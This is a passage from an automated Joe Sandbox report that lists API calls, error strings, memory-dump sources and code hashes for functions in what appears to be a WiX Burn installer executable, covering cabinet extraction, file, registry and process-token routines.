                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                              • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                              • API String ID: 1970631241-3111339858
                                                                                                                                                              • Opcode ID: cd44277640149b1e677380b7ecd4395c8e8e5d1307a15f6c4b877d5b95543ccb
                                                                                                                                                              • Instruction ID: 89ac8ac6fe46f387fc86dbaae35a68b93ee8c6286ea61c0f777fcb3818f61fa5
                                                                                                                                                              • Opcode Fuzzy Hash: cd44277640149b1e677380b7ecd4395c8e8e5d1307a15f6c4b877d5b95543ccb
                                                                                                                                                              • Instruction Fuzzy Hash: D621D1BB600215ABCB10DFACE985D5A7BB8FF85321B214269FE04D7246E672DD00CB60
                                                                                                                                                              Function 00A40879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • OpenProcessToken.ADVAPI32(?,00000008,?,00A053BD,00000000,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A40897
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A408A1
                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A408D3
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A408EC
                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,00A1769D,00000000), ref: 00A4092B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                              • String ID: procutil.cpp
                                                                                                                                                              • API String ID: 4040495316-1178289305
                                                                                                                                                              • Opcode ID: d483f404c98bda605574549d0c6796a1ecb2ed4c9ad41e0a413acec84117374f
                                                                                                                                                              • Instruction ID: f0a569b2fb0d17d18e6831b00f0436f273013f6d0c10af56840c88dbd2b29555
                                                                                                                                                              • Opcode Fuzzy Hash: d483f404c98bda605574549d0c6796a1ecb2ed4c9ad41e0a413acec84117374f
                                                                                                                                                              • Instruction Fuzzy Hash: 4921D43AD00229EFEB20DB999905E9EBBB8EFD0711F014056AE55EB251D3708E00EAD0
                                                                                                                                                              Function 00A20C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A20CC4
                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A20CD6
                                                                                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A20CE9
                                                                                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00A208B1,?,?), ref: 00A20CF8
                                                                                                                                                              Strings
                                                                                                                                                              • cabextract.cpp, xrefs: 00A20C93
                                                                                                                                                              • Invalid operation for this state., xrefs: 00A20C9D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                              • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 609741386-1751360545
                                                                                                                                                              • Opcode ID: 81563f1f703e9130460080b439973b924acc982b7ebad4c5860288fd79e1a6ff
                                                                                                                                                              • Instruction ID: bd97c2f132aea316c12272c6bb1db98e8e3ccc52e0b904eaaf7cf2728bfd2ebb
                                                                                                                                                              • Opcode Fuzzy Hash: 81563f1f703e9130460080b439973b924acc982b7ebad4c5860288fd79e1a6ff
                                                                                                                                                              • Instruction Fuzzy Hash: 5E21D172811229AB8B10DFACE909DFA7BBCFF443207108226F854D6591D371E911CB90
                                                                                                                                                              Function 00A43565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00A43574
                                                                                                                                                              • InterlockedIncrement.KERNEL32(00A6B6C8), ref: 00A43591
                                                                                                                                                              • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,00A6B6B8,?,?,?,?,?,?), ref: 00A435AC
                                                                                                                                                              • CLSIDFromProgID.OLE32(MSXML.DOMDocument,00A6B6B8,?,?,?,?,?,?), ref: 00A435B8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                              • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                              • API String ID: 2109125048-2356320334
                                                                                                                                                              • Opcode ID: 37ec4e6f63fea923d91bcf993856129593a74804620c1fb5927951e54a48c731
                                                                                                                                                              • Instruction ID: 31d6319379ec086517cbe9f8f023f6f5cface0ac45da66bbf8ae353b5edcccb1
                                                                                                                                                              • Opcode Fuzzy Hash: 37ec4e6f63fea923d91bcf993856129593a74804620c1fb5927951e54a48c731
                                                                                                                                                              • Instruction Fuzzy Hash: 93F0E53E750125AFCB219BEAFD08B472E79EBC1B55F000829E800C6064D3B0D98286B2
                                                                                                                                                              Function 00A44A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00A44A9D
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00A44ACA
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00A44AF6
                                                                                                                                                              • GetLastError.KERNEL32(00000000,00A4B7A0,?,00000000,?,00000000,?,00000000), ref: 00A44B34
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A44B65
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 1145190524-2967768451
                                                                                                                                                              • Opcode ID: 025090bc2379e5ecbc6c30c05e5032b71f0b94f79120d59b16ed48e8d0260cb6
                                                                                                                                                              • Instruction ID: ce5d446784fd2f9bc9f7e9d9c375a6ca18f6561a87ad6097727904f629311e4e
                                                                                                                                                              • Opcode Fuzzy Hash: 025090bc2379e5ecbc6c30c05e5032b71f0b94f79120d59b16ed48e8d0260cb6
                                                                                                                                                              • Instruction Fuzzy Hash: 0131813F940229ABD712DB998C41FAFBAB8EFC8790F114165ED14E7241D730DD0186E4
                                                                                                                                                              Function 00A1E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • DefWindowProcW.USER32(?,00000082,?,?), ref: 00A1E985
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 00A1E994
                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 00A1E9A8
                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00A1E9B8
                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00A1E9D2
                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00A1EA31
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3812958022-0
                                                                                                                                                              • Opcode ID: c4556cf20f0300410d9522dfb46e717669c17435280a074f33d02eb9fd1cab82
                                                                                                                                                              • Instruction ID: b1df42cd84cf12ff627d907927a614f61fa5738f9997d9fd1d81c230dfaa463f
                                                                                                                                                              • Opcode Fuzzy Hash: c4556cf20f0300410d9522dfb46e717669c17435280a074f33d02eb9fd1cab82
                                                                                                                                                              • Instruction Fuzzy Hash: D821C13A104118FFDF11DFA8DC08EAA3B69FF85351F144618F9069A1A4C732EDA0DB60
                                                                                                                                                              Function 00A20A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00A20B27
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?), ref: 00A20B31
                                                                                                                                                              Strings
                                                                                                                                                              • cabextract.cpp, xrefs: 00A20B55
                                                                                                                                                              • Failed to move file pointer 0x%x bytes., xrefs: 00A20B62
                                                                                                                                                              • Invalid seek type., xrefs: 00A20ABD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                              • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                              • API String ID: 2976181284-417918914
                                                                                                                                                              • Opcode ID: 8330ec25905e4301f1480f22115bc3499dc57a46ba464f34fe1d84f6d962d332
                                                                                                                                                              • Instruction ID: 1786eaeb0c5b7cc863999292162c2e3ac707de92c194567ac7274bbc3d6d0da8
                                                                                                                                                              • Opcode Fuzzy Hash: 8330ec25905e4301f1480f22115bc3499dc57a46ba464f34fe1d84f6d962d332
                                                                                                                                                              • Instruction Fuzzy Hash: A631A376A4022AFFCB10DFACE845DAEB779FB04764B148225FD1497652D370ED108B90
                                                                                                                                                              Function 00A04115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,00A1A0E8,00000000,00000000,?,00000000,00A053BD,00000000,?,?,00A0D5B5,?), ref: 00A04123
                                                                                                                                                              • GetLastError.KERNEL32(?,00A1A0E8,00000000,00000000,?,00000000,00A053BD,00000000,?,?,00A0D5B5,?,00000000,00000000), ref: 00A04131
                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,840F01E8,00A05489,?,00A1A0E8,00000000,00000000,?,00000000,00A053BD,00000000,?,?,00A0D5B5,?,00000000), ref: 00A0419A
                                                                                                                                                              • GetLastError.KERNEL32(?,00A1A0E8,00000000,00000000,?,00000000,00A053BD,00000000,?,?,00A0D5B5,?,00000000,00000000), ref: 00A041A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                              • String ID: dirutil.cpp
                                                                                                                                                              • API String ID: 1375471231-2193988115
                                                                                                                                                              • Opcode ID: 262b6df00af95ddb0f2b50000135d276926fbb224a7d4656373330163b74ea06
                                                                                                                                                              • Instruction ID: 8065d1a57d548572898b9bfd94c7aec58b3e81a004ed2c79e60b28e5451d42b2
                                                                                                                                                              • Opcode Fuzzy Hash: 262b6df00af95ddb0f2b50000135d276926fbb224a7d4656373330163b74ea06
                                                                                                                                                              • Instruction Fuzzy Hash: 0411C3BA60073DA6D7315BA57C44B3BA664FFB9B61F114221FF09AA1D0E3608C8192D1
                                                                                                                                                              Function 00A13AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00A40F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A6AAA0,00000000,?,00A457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00A40F80
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00A13FB5,feclient.dll,?,00000000,?,?,?,00A04B12), ref: 00A13B42
                                                                                                                                                                • Part of subcall function 00A410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A4112B
                                                                                                                                                                • Part of subcall function 00A410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00A41163
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                                                              • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                              • API String ID: 1586453840-3596319545
                                                                                                                                                              • Opcode ID: 76e449974f7f820e7f6e997cd234b2f34e1bba09045bb790689345c3ff7d5470
                                                                                                                                                              • Instruction ID: e616b04bc363c6e9e75dcd1742da84e8ff4177e739cdc25a98d4d207896d1b09
                                                                                                                                                              • Opcode Fuzzy Hash: 76e449974f7f820e7f6e997cd234b2f34e1bba09045bb790689345c3ff7d5470
                                                                                                                                                              • Instruction Fuzzy Hash: 3D118E37A48208BBDF21DF95DD82EEABBB8EB50741F4040A5E601AB091E6719FC1D610
                                                                                                                                                              Function 00A40764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(00A1E93B,00000000,00000000,?,?,?,00A40013,00A1E93B,00A1E93B,?,00000000,0000FDE9,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A40776
                                                                                                                                                              • WriteFile.KERNELBASE(00000200,00000000,00000000,?,00000000,?,?,00A40013,00A1E93B,00A1E93B,?,00000000,0000FDE9,?,00A1E93B,8000FFFF), ref: 00A407B2
                                                                                                                                                              • GetLastError.KERNEL32(?,?,00A40013,00A1E93B,00A1E93B,?,00000000,0000FDE9,?,00A1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00A407BC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                              • String ID: logutil.cpp
                                                                                                                                                              • API String ID: 606256338-3545173039
                                                                                                                                                              • Opcode ID: bd50acace852d1c108796aacea920985f90205b0c0d1648ad1f0518c3b70660a
                                                                                                                                                              • Instruction ID: c49efef616d1455402154e9ce2d9a499461d5e7340d80d3222807dcdb0a7730c
                                                                                                                                                              • Opcode Fuzzy Hash: bd50acace852d1c108796aacea920985f90205b0c0d1648ad1f0518c3b70660a
                                                                                                                                                              • Instruction Fuzzy Hash: E811CA7A940524ABC710DBB9DD44EABBA7CEBC5760B014214FE01E7140D771ED00DAE1
                                                                                                                                                              Function 00A209EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00A2140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00A20A19,?,?,?), ref: 00A21434
                                                                                                                                                                • Part of subcall function 00A2140C: GetLastError.KERNEL32(?,00A20A19,?,?,?), ref: 00A2143E
                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00A20A27
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A20A31
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to read during cabinet extraction., xrefs: 00A20A5F
                                                                                                                                                              • cabextract.cpp, xrefs: 00A20A55
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$PointerRead
                                                                                                                                                              • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                              • API String ID: 2170121939-2426083571
                                                                                                                                                              • Opcode ID: af5718f3ab42663e85de5abd16c36c2a3a8f771528b91813b0931b463bf9d5b9
                                                                                                                                                              • Instruction ID: 797ff28746f0521ad78fef96de5eff98399eb9ab96e3abd1031476280f0db196
                                                                                                                                                              • Opcode Fuzzy Hash: af5718f3ab42663e85de5abd16c36c2a3a8f771528b91813b0931b463bf9d5b9
                                                                                                                                                              • Instruction Fuzzy Hash: B811CE7BA00279BBCB219F99ED04E9E7F78FB457A0B014265FE04A7291C7309910CAE0
                                                                                                                                                              Function 00A2140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00A20A19,?,?,?), ref: 00A21434
                                                                                                                                                              • GetLastError.KERNEL32(?,00A20A19,?,?,?), ref: 00A2143E
                                                                                                                                                              Strings
                                                                                                                                                              • cabextract.cpp, xrefs: 00A21462
                                                                                                                                                              • Failed to move to virtual file pointer., xrefs: 00A2146C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                              • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                              • API String ID: 2976181284-3005670968
                                                                                                                                                              • Opcode ID: 1140f5b8a8384481a89f25d52a910e2e7b429353fb7f9a2f2f00801ae0b1543b
                                                                                                                                                              • Instruction ID: bf399738fdc7b8bcce6259f983321af5e7bd4f1a682bbdb1500a74c3abd3c5d9
                                                                                                                                                              • Opcode Fuzzy Hash: 1140f5b8a8384481a89f25d52a910e2e7b429353fb7f9a2f2f00801ae0b1543b
                                                                                                                                                              • Instruction Fuzzy Hash: 4E018477540639B7C7219A99AC09E8BBF25FF607717118125FD2C5A151D731D810C6D0
                                                                                                                                                              Function 00A207B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetEvent.KERNEL32(00A4B478,00000000,?,00A21717,?,00000000,?,00A0C287,?,00A05405,?,00A175A5,?,?,00A05405,?), ref: 00A207BF
                                                                                                                                                              • GetLastError.KERNEL32(?,00A21717,?,00000000,?,00A0C287,?,00A05405,?,00A175A5,?,?,00A05405,?,00A05445,00000001), ref: 00A207C9
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set begin operation event., xrefs: 00A207F7
                                                                                                                                                              • cabextract.cpp, xrefs: 00A207ED
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorEventLast
                                                                                                                                                              • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                              • API String ID: 3848097054-4159625223
                                                                                                                                                              • Opcode ID: 07672cb39e025761d312cd7cdc93018884d36100b55f8377a8927ce13961fdf7
                                                                                                                                                              • Instruction ID: 208a7da157f6f7f5ee4222a69c841c79334a54342ad6def247bf1677a7a04ce4
                                                                                                                                                              • Opcode Fuzzy Hash: 07672cb39e025761d312cd7cdc93018884d36100b55f8377a8927ce13961fdf7
                                                                                                                                                              • Instruction Fuzzy Hash: 29F0273B64263163822063AD6D05E8B7688AE01BA1B010131FF00B7181E670AC00C2E5
                                                                                                                                                              Function 00A05123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00A01104,?,?,00000000), ref: 00A05142
                                                                                                                                                              • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00A01104,?,?,00000000), ref: 00A05172
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
